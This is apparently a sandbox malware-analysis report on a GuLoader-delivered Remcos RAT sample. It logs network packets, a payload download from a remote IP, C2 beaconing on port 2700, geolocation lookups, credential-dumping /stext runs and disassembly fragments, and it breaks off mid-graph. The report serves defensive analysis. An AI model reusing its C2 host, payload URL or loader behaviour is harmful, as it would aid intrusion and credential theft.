                                                          Sep 27, 2024 13:00:06.337019920 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:00:06.506661892 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:00:33.560115099 CEST4978580192.168.11.20178.237.33.50
                                                          Sep 27, 2024 13:00:33.560127974 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:00:33.675352097 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:00:33.675576925 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:00:34.044326067 CEST4978580192.168.11.20178.237.33.50
                                                          Sep 27, 2024 13:00:34.997214079 CEST4978580192.168.11.20178.237.33.50
                                                          Sep 27, 2024 13:00:36.344964027 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:00:36.346700907 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:00:36.506958961 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:00:36.887522936 CEST4978580192.168.11.20178.237.33.50
                                                          Sep 27, 2024 13:00:40.652240992 CEST4978580192.168.11.20178.237.33.50
                                                          Sep 27, 2024 13:00:48.184223890 CEST4978580192.168.11.20178.237.33.50
                                                          Sep 27, 2024 13:01:03.225425959 CEST4978580192.168.11.20178.237.33.50
                                                          Sep 27, 2024 13:01:06.354752064 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:01:06.357554913 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:01:06.516073942 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:01:36.443008900 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:01:36.445969105 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:01:36.617553949 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:02:06.529062033 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:02:06.530972004 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:02:06.693042040 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:02:36.556691885 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:02:36.558849096 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:02:36.728075027 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:03:06.578299046 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:03:06.580902100 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:03:06.750124931 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:03:36.598783970 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:03:36.645076036 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:03:36.702693939 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:03:36.864204884 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:04:06.599879980 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:04:06.654134989 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:04:06.735706091 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:04:06.898937941 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:04:36.614609957 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:04:36.663201094 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:04:36.738317013 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:04:36.896157980 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:05:06.627314091 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:05:06.672337055 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:05:06.719372988 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:05:06.878874063 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:05:36.640769958 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:05:36.681307077 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:05:36.760833025 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:05:36.922425032 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:06:06.656222105 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:06:06.706001043 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:06:06.753981113 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:06:06.915798903 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:06:36.680746078 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:06:36.730736017 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:06:36.775383949 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:06:36.946144104 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:07:06.726702929 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:07:06.727732897 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:07:06.882796049 CEST27004978466.150.198.142192.168.11.20

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Sep 27, 2024 12:58:45.897576094 CEST6113053192.168.11.201.1.1.1
                                                          Sep 27, 2024 12:58:46.007960081 CEST53611301.1.1.1192.168.11.20

                                                          DNS Queries

                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Sep 27, 2024 12:58:45.897576094 CEST192.168.11.201.1.1.10x1868Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                          DNS Answers

                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Sep 27, 2024 12:58:46.007960081 CEST1.1.1.1192.168.11.200x1868No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                          HTTP Request Dependency Graph

                                                          • 66.150.198.142
                                                          • geoplugin.net

                                                          HTTP Packets

                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.11.204978366.150.198.142806512C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 27, 2024 12:58:43.691420078 CEST181OUTGET /lOqpXUmQJccVjyn149.bin HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                          Host: 66.150.198.142
                                                          Cache-Control: no-cache
                                                          Sep 27, 2024 12:58:43.810106993 CEST1289INHTTP/1.1 200 OK
                                                          Content-Type: application/octet-stream
                                                          Last-Modified: Fri, 27 Sep 2024 08:40:56 GMT
                                                          Accept-Ranges: bytes
                                                          ETag: "96972ff8b810db1:0"
                                                          Server: Microsoft-IIS/10.0
                                                          Date: Fri, 27 Sep 2024 10:58:43 GMT
                                                          Content-Length: 494656
                                                          Data Raw: ad 2d 67 61 c1 42 00 e9 29 a6 d1 6d f2 06 ca f3 f6 b3 39 39 ef 64 d3 17 29 25 2d 23 39 5f 0d 88 80 72 49 6a 2a 2b 18 93 fc cf 28 02 36 0e 58 55 ac b5 2f cb d6 67 46 3b 8e 12 3d 5e 04 9a a2 93 0c 51 ec 43 2f ce ee 11 68 12 c0 9f 07 46 93 5d c7 be c0 7e e9 f6 c8 ef 5a 19 84 be a8 19 c2 93 bc 0f af 4e 80 bc a8 ee 56 bf 64 ef ac cd 3e 9a d1 91 06 3c fb 2e 2c 16 a1 b3 27 31 89 f9 ca 14 87 82 a2 2b 50 e8 0e 94 4d 29 0a 4a 86 af 6e 72 89 ea 45 0a 19 50 c0 98 60 84 5f 87 06 60 6b 24 35 ef 78 c3 6d 8f 2a 52 37 c2 3f 70 b7 cb 31 d8 ee b0 3f 74 31 f9 80 1e 97 25 c2 26 80 d3 73 32 99 c2 e8 06 16 46 e8 5a c6 9b 1c 12 72 c0 1a c7 9f d4 e8 6a b7 4e 4f 69 d5 38 53 14 05 7c 7c 53 03 00 b8 46 15 91 d2 f5 94 87 44 a2 51 63 39 40 bd 06 0f 57 ae 14 74 b5 d5 be 4a 08 2b 10 91 6c 0a d2 67 65 1d 59 b7 ff 1a a0 de a8 c9 06 05 46 60 ca b8 da 72 2c 89 e2 76 8e e6 fb ad ed db 14 7d f4 c7 e4 66 2c 35 dc 43 22 e4 4c 9f 27 73 d1 c0 94 21 6a 9b 4f 5f d0 02 e3 c5 74 ad e6 99 66 23 78 2b ad 5d 72 70 44 61 1d d4 9f e6 60 53 d7 c6 e7 [TRUNCATED]
                                                          Data Ascii: -gaB)m99d)%-#9_rIj*+(6XU/gF;=^QC/hF]~ZNVd><.,'1+PM)JnrEP`_`k$5xm*R7?p1?t1%&s2FZrjNOi8S||SFDQc9@WtJ+lgeYF`r,v}f,5C"L's!jO_tf#x+]rpDa`S#sS)Jk[k'B/o?)MI{aMITWdC2g-|k?L7m0k5>Br!Icp.wz^h#0G5ryDJR4~`/?n@xX)Erihm+0/],`1ye+ge4;D=K> ,l"hW+nmkn4ISNdqSRlIFwIwDC3j.*0s60?5YDoH|sbiFuyh\i}[u9h;fUt-jD8*9r-;$'sQr_KWi1vUOGf#/7Xt(5z^@-(UAk\7-y/]\**!b9sbR":f&[/z)zX0G2h&` rwY [TRUNCATED]
                                                          Sep 27, 2024 12:58:43.810189962 CEST1289INData Raw: 31 c6 c2 e8 4f 8d 8d 9c 30 0d ea ed dd 31 c5 cd 51 5d b7 9d d7 98 a4 17 9a d4 f3 9c 4d c8 e1 e6 f2 b3 84 a4 28 5d c9 78 d9 34 e6 aa 4d 7c 5e f7 31 d4 da 75 a1 af cb 09 5f fc 6a 7e e6 43 8c 20 c1 e1 48 07 72 d0 fe 67 b7 09 c9 eb 44 21 db 64 33 69
                                                          Data Ascii: 1O01Q]M(]x4M|^1u_j~C HrgD!d3i^R>\RzG'!w[fj:<*yNYc3C20ihp6d]Z{<l55&~|DnHKwEI~>,%mQd
                                                          Sep 27, 2024 12:58:43.810250044 CEST1289INData Raw: b8 ad 7b 8c d9 5a c7 5e e8 ad 89 fc 2d 40 ca 22 b6 16 bd ce 72 cf 6b 05 f4 bc 43 4f 68 01 41 6a 4b c0 ab 94 16 47 40 dc 19 fa c2 41 b7 89 16 ce 5c 42 52 a0 27 39 77 20 8f 08 db ff 40 ca 07 db 84 62 ba 91 1c 8e e2 c7 d1 84 23 d3 51 c8 f8 90 a5 93
                                                          Data Ascii: {Z^-@"rkCOhAjKG@A\BR'9w @b#Qs-]M@A_TjDX|F?*9.c;jYo[GUk|'W>.wB[MGN-V_;rNYxp %0N1nu"?W
                                                          Sep 27, 2024 12:58:43.810306072 CEST1289INData Raw: e3 69 4a 2a 9b 91 91 e1 34 36 ce 57 32 3c 99 af 9f e9 bf c3 62 c1 90 b5 76 55 51 48 0f 17 10 4f c7 ad 44 b3 d5 14 e8 07 89 c6 94 63 b9 8b c0 c2 9a 32 19 41 c1 ca 66 69 0e 81 3d 19 7f ed 8d a7 09 c7 a1 c8 e9 81 85 12 17 39 f7 73 7d bd 60 fa dc 6f
                                                          Data Ascii: iJ*46W2<bvUQHODc2Afi=9s}`oS!gV5P:3-N(D$XvR2lb<SDNS$j}D7qE%v@,[7|_-5z=(2VLWM,*kT"oXu2&8
                                                          Sep 27, 2024 12:58:43.810362101 CEST1289INData Raw: 1c af 0d c7 ba 6a 36 8d a2 b2 1a 7f e0 76 be 0c cf 6f 01 65 2f ed 9d 60 97 fc 53 93 11 cc 03 10 a8 ad b2 cb 94 09 7a 2a 44 b0 12 18 0f 49 92 1c 6e d4 2d c8 a1 d8 9c 95 27 2a 44 7c 78 e1 2d ab ed 4a d6 c9 14 c6 2e d7 60 61 3e 32 d9 8c 9b 20 4c e1
                                                          Data Ascii: j6voe/`Sz*DIn-'*D|x-J.`a>2 L1?m5G=K!X2DxMkK7F^`f6n,LM*Zs{;=}Bq2@'OFb.m
                                                          Sep 27, 2024 12:58:43.810416937 CEST1289INData Raw: b5 d9 2a 2f 81 31 c6 05 61 22 5c 8a a6 45 b5 a9 a7 1b d1 87 d4 2e 99 7e fb 47 ea d3 94 cf 19 14 77 c3 2e 15 64 f7 dc f8 0e 3e c5 83 09 53 38 10 e7 10 ed 1c bf 41 eb 1a bf 66 04 1d e1 31 46 16 07 9b 97 24 76 b2 f9 df dd 56 c6 eb 4f 82 3c ce f4 a2
                                                          Data Ascii: */1a"\E.~Gw.d>S8Af1F$vVO<A1JM^EEi\l+hG3g\`]Ah,jmF>ZvGi[iXGL!a Qtu|c%QhF0Scd`wzq#zX)*UIkh45iny'
                                                          Sep 27, 2024 12:58:43.810472012 CEST1289INData Raw: e8 a5 e3 fe 93 4a d8 ce 1a 37 35 24 df 75 81 26 50 5c ec 6b ec ed 2f 16 4b fa 25 99 1e 89 16 60 e0 f0 4f f9 f8 16 80 6f a8 85 05 70 b1 c0 58 60 1d 97 5e d4 84 51 ae af 18 88 e7 0e f6 d5 0d 9a d0 1c 9d 14 b3 25 47 d0 df dc e6 f2 cb 7b 58 2b b6 10
                                                          Data Ascii: J75$u&P\k/K%`OopX`^Q%G{X+qMQ0g!dA'"(t*Gwo4:*S1iT(Yh[ow)kD$HdIsT!)ab: qQ7K!g\#6TL6\$.HD &7@
                                                          Sep 27, 2024 12:58:43.810544968 CEST1289INData Raw: ba dd f1 c7 3e 3f 7c e6 ac 63 81 39 0c a9 ef 34 1a e7 c2 8f bc 63 63 c6 e8 ab a5 d8 8e df 29 07 6e 1f d6 3a 41 61 87 50 d6 00 ec c3 f9 24 d6 9c a7 ea 45 46 b0 73 b7 f9 97 1b b0 b6 68 6b e3 82 c2 71 92 5d 73 71 85 ea a2 fb b5 c5 ef 8f 88 8f b6 cf
                                                          Data Ascii: >?|c94cc)n:AaP$EFshkq]sq]]LtWGK;?#HAC#~\G,vm0FP*KbdKWIX7GuCWe*p\FrgdZ>*|Dd5FZ `lagCDNc
                                                          Sep 27, 2024 12:58:43.810600996 CEST1289INData Raw: 94 fb 44 7e 23 93 36 81 3b e0 25 8d a3 64 7a 21 bb 8c 4e e1 e6 10 31 3c ea f7 53 6e 2a 45 f1 31 4d 8d 07 fb 0a bc 10 30 92 9d 5d 31 af c2 62 8a 6d 0f d7 32 e2 35 d6 75 e6 74 84 6a 4f de d2 3d dc 20 4c 6c 52 0c 85 19 58 42 ea b3 5c b9 72 f7 79 25
                                                          Data Ascii: D~#6;%dz!N1<Sn*E1M0]1bm25utjO= LlRXB\ry%}T258zSf/=.v} :)oxomZb-pG.R&{-EQ&"b]5y<{BVr`f1|EF[LMe|sJ0nNb9v:=UV5=)2:Xh
                                                          Sep 27, 2024 12:58:43.810658932 CEST1289INData Raw: 9d fd 88 91 d7 34 21 6d 34 23 a7 1a 5c 75 e2 de b8 a7 53 50 63 cf 8e 2e e1 56 ff 90 25 4b ac 48 62 88 13 62 4a c4 8f 31 8c 4d 43 2f 0e a7 43 7b 5b e4 0e 9f 2f b3 34 d4 3f e8 17 ae e0 b2 50 86 51 d1 ac f8 68 4b 47 6f 57 15 bc 2a 1c 0c b9 19 cb 3e
                                                          Data Ascii: 4!m4#\uSPc.V%KHbbJ1MC/C{[/4?PQhKGoW*>Y$_BPKb?^sBl{pq.KV|"6hn}QBX_GP"K$a|!P3YUXI<M-gJ\rjV(~S)5xt6kbJ60"u!tC%AHC
                                                          Sep 27, 2024 12:58:43.926126003 CEST1289INData Raw: 3c d0 78 3a c8 7b f7 fe f4 07 3f 3e 19 76 83 8f 67 69 73 65 a1 ff c2 70 74 e3 2b cc f3 1b eb b1 3a be cf ac 5f f4 84 66 1d f5 fe 56 16 bd cf 20 03 86 c7 7f b9 a3 05 a1 fe a1 ae 15 54 b4 e7 b0 e9 33 d0 70 39 42 f4 8e 4e 51 97 28 05 c0 26 76 87 a9
                                                          Data Ascii: <x:{?>vgisept+:_fV T3p9BNQ(&vCG,{;@%_sXYjyXN_y3Ei,L%/:LubNZ7izz&F#&KNAhE}Q9P*)h/Oh0X(6&


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.11.2049785178.237.33.50806512C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          TimestampBytes transferredDirectionData
                                                          Sep 27, 2024 12:58:46.200033903 CEST71OUTGET /json.gp HTTP/1.1
                                                          Host: geoplugin.net
                                                          Cache-Control: no-cache
                                                          Sep 27, 2024 12:58:46.394920111 CEST1171INHTTP/1.1 200 OK
                                                          date: Fri, 27 Sep 2024 10:58:46 GMT
                                                          server: Apache
                                                          content-length: 963
                                                          content-type: application/json; charset=utf-8
                                                          cache-control: public, max-age=300
                                                          access-control-allow-origin: *
                                                          Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 37 39 2e 31 32 37 2e 31 33 32 2e 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 41 73 68 62 75 72 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 56 69 72 67 69 6e 69 61 22 2c 0a 20 20 22 67 65 [TRUNCATED]
                                                          Data Ascii: { "geoplugin_request":"79.127.132.20", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Ashburn", "geoplugin_region":"Virginia", "geoplugin_regionCode":"VA", "geoplugin_regionName":"Virginia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"511", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"39.0469", "geoplugin_longitude":"-77.4903", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:06:58:19
                                                          Start date:27/09/2024
                                                          Path:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe"
                                                          Imagebase:0x400000
                                                          File size:814'515 bytes
                                                          MD5 hash:50AD24C74502951D0BEC1507CA050C46
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.316846928075.0000000007E80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:06:58:33
                                                          Start date:27/09/2024
                                                          Path:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe"
                                                          Imagebase:0x400000
                                                          File size:814'515 bytes
                                                          MD5 hash:50AD24C74502951D0BEC1507CA050C46
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.321700699296.00000000060D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.321700699296.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:false

                                                          General

                                                          Target ID:3
                                                          Start time:06:58:47
                                                          Start date:27/09/2024
                                                          Path:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\ubmgcrsfyvpwitpwpupfvcprqao"
                                                          Imagebase:0x400000
                                                          File size:814'515 bytes
                                                          MD5 hash:50AD24C74502951D0BEC1507CA050C46
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:4
                                                          Start time:06:58:47
                                                          Start date:27/09/2024
                                                          Path:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\fdszcjcgmdhbszdagejyggbiyhyoajw"
                                                          Imagebase:0x400000
                                                          File size:814'515 bytes
                                                          MD5 hash:50AD24C74502951D0BEC1507CA050C46
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:06:58:47
                                                          Start date:27/09/2024
                                                          Path:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\pxxsdbnaalzgvfzeppwajtwrhnqxtundeo"
                                                          Imagebase:0x400000
                                                          File size:814'515 bytes
                                                          MD5 hash:50AD24C74502951D0BEC1507CA050C46
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:27.5%
                                                            Dynamic/Decrypted Code Coverage:30%
                                                            Signature Coverage:18.4%
                                                            Total number of Nodes:700
                                                            Total number of Limit Nodes:17
                                                            execution_graph 2930 10001000 2933 1000101b 2930->2933 2940 10001516 2933->2940 2935 10001020 2936 10001024 2935->2936 2937 10001027 GlobalAlloc 2935->2937 2938 1000153d 3 API calls 2936->2938 2937->2936 2939 10001019 2938->2939 2941 1000151c 2940->2941 2942 10001522 2941->2942 2943 1000152e GlobalFree 2941->2943 2942->2935 2943->2935 2944 100010e1 2953 10001111 2944->2953 2945 100011d8 GlobalFree 2946 100012ba 2 API calls 2946->2953 2947 100011d3 2947->2945 2948 10001272 2 API calls 2951 100011c4 GlobalFree 2948->2951 2949 10001164 GlobalAlloc 2949->2953 2950 100011f8 GlobalFree 2950->2953 2951->2953 2952 100012e1 lstrcpyW 2952->2953 2953->2945 2953->2946 2953->2947 2953->2948 2953->2949 2953->2950 2953->2951 2953->2952 2677 100027c2 2678 10002812 2677->2678 2679 100027d2 VirtualProtect 2677->2679 2679->2678 3004 100018a9 3005 100018cc 3004->3005 3006 10001911 3005->3006 3007 100018ff GlobalFree 3005->3007 3008 10001272 2 API calls 3006->3008 3007->3006 3009 10001a87 GlobalFree GlobalFree 3008->3009 3013 1000164f 3014 10001516 GlobalFree 3013->3014 3016 10001667 3014->3016 3015 100016ad GlobalFree 3016->3015 3017 10001682 3016->3017 3018 10001699 VirtualFree 3016->3018 3017->3015 3018->3015 2190 403350 SetErrorMode GetVersion 2191 403395 2190->2191 2192 40338f 2190->2192 2281 4065c9 GetSystemDirectoryW 2191->2281 2193 406639 5 API calls 2192->2193 2193->2191 2195 4033ab lstrlenA 2195->2191 2196 4033bb 2195->2196 2284 406639 GetModuleHandleA 2196->2284 2199 406639 5 API calls 2200 4033c9 2199->2200 2201 406639 5 API calls 2200->2201 2202 4033d5 #17 OleInitialize SHGetFileInfoW 2201->2202 2290 40625f lstrcpynW 2202->2290 2205 403421 GetCommandLineW 2291 40625f lstrcpynW 2205->2291 2207 403433 GetModuleHandleW 2208 40344b 2207->2208 2292 405b5d 2208->2292 2211 403584 GetTempPathW 2296 40331f 2211->2296 2213 40359c 2214 4035a0 GetWindowsDirectoryW lstrcatW 2213->2214 2215 4035f6 DeleteFileW 2213->2215 2217 40331f 12 API calls 2214->2217 2306 402ec1 GetTickCount GetModuleFileNameW 2215->2306 2216 403473 2218 405b5d CharNextW 2216->2218 2223 40356d 2216->2223 2225 40356f 2216->2225 2221 4035bc 2217->2221 2218->2216 2220 40360a 2227 405b5d CharNextW 2220->2227 2263 4036ad 2220->2263 2276 4036bd 2220->2276 2221->2215 2222 4035c0 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2221->2222 2226 40331f 12 API calls 2222->2226 2223->2211 2398 40625f lstrcpynW 2225->2398 2231 4035ee 2226->2231 2244 403629 2227->2244 2231->2215 2231->2276 2232 4037f7 2235 40387b ExitProcess 2232->2235 2236 4037ff GetCurrentProcess OpenProcessToken 2232->2236 2233 4036d7 2422 4058c1 2233->2422 2241 403817 LookupPrivilegeValueW AdjustTokenPrivileges 2236->2241 2242 40384b 2236->2242 2238 403687 2399 405c38 2238->2399 2239 4036ed 2390 40582c 2239->2390 2241->2242 2243 406639 5 API calls 2242->2243 2250 403852 2243->2250 2244->2238 2244->2239 2249 403867 ExitWindowsEx 2249->2235 2254 403874 2249->2254 2250->2249 2250->2254 2251 403703 lstrcatW 2252 40370e lstrcatW lstrcmpiW 2251->2252 2253 40372a 2252->2253 2252->2276 2257 403736 2253->2257 2258 40372f 2253->2258 2455 40140b 2254->2455 2256 4036a2 2414 40625f lstrcpynW 2256->2414 2426 40580f CreateDirectoryW 2257->2426 2393 405792 CreateDirectoryW 2258->2393 2334 40396d 2263->2334 2265 40373b SetCurrentDirectoryW 2266 403756 2265->2266 2267 40374b 2265->2267 2430 40625f lstrcpynW 2266->2430 2429 40625f lstrcpynW 2267->2429 2272 4037a2 CopyFileW 2278 403764 2272->2278 2273 4037eb 2275 406025 36 API calls 2273->2275 2275->2276 2415 403893 2276->2415 2277 406281 17 API calls 2277->2278 2278->2273 2278->2277 2280 4037d6 CloseHandle 2278->2280 2431 406281 2278->2431 2448 406025 MoveFileExW 2278->2448 2452 405844 CreateProcessW 2278->2452 2280->2278 2282 4065eb wsprintfW LoadLibraryExW 2281->2282 2282->2195 2285 406655 2284->2285 2286 40665f GetProcAddress 2284->2286 2288 4065c9 3 API calls 2285->2288 2287 4033c2 2286->2287 2287->2199 2289 40665b 2288->2289 2289->2286 2289->2287 2290->2205 2291->2207 2293 405b63 2292->2293 2294 40345a CharNextW 2293->2294 2295 405b6a CharNextW 2293->2295 2294->2211 2294->2216 2295->2293 2458 4064f3 2296->2458 2298 403335 2298->2213 2299 40332b 2299->2298 2467 405b30 lstrlenW CharPrevW 2299->2467 2302 40580f 2 API calls 2303 403343 2302->2303 2470 405d80 2303->2470 2474 405d51 GetFileAttributesW CreateFileW 2306->2474 2308 402f01 2328 402f11 2308->2328 2475 40625f lstrcpynW 2308->2475 2310 402f27 2476 405b7c lstrlenW 2310->2476 2314 402f38 GetFileSize 2315 403034 2314->2315 2333 402f4f 2314->2333 2481 402e5d 2315->2481 2317 40303d 2319 40306d GlobalAlloc 2317->2319 2317->2328 2516 403308 SetFilePointer 2317->2516 2492 403308 SetFilePointer 2319->2492 2321 4030a0 2325 402e5d 6 API calls 2321->2325 2323 403056 2326 4032f2 ReadFile 2323->2326 2324 403088 2493 4030fa 2324->2493 2325->2328 2329 403061 2326->2329 2328->2220 2329->2319 2329->2328 2330 402e5d 6 API calls 2330->2333 2331 403094 2331->2328 2331->2331 2332 4030d1 SetFilePointer 2331->2332 2332->2328 2333->2315 2333->2321 2333->2328 2333->2330 2513 4032f2 2333->2513 2335 406639 5 API calls 2334->2335 2336 403981 2335->2336 2337 403987 2336->2337 2338 403999 2336->2338 2545 4061a6 wsprintfW 2337->2545 2546 40612d 2338->2546 2341 4039e8 lstrcatW 2344 403997 2341->2344 2343 40612d 3 API calls 2343->2341 2537 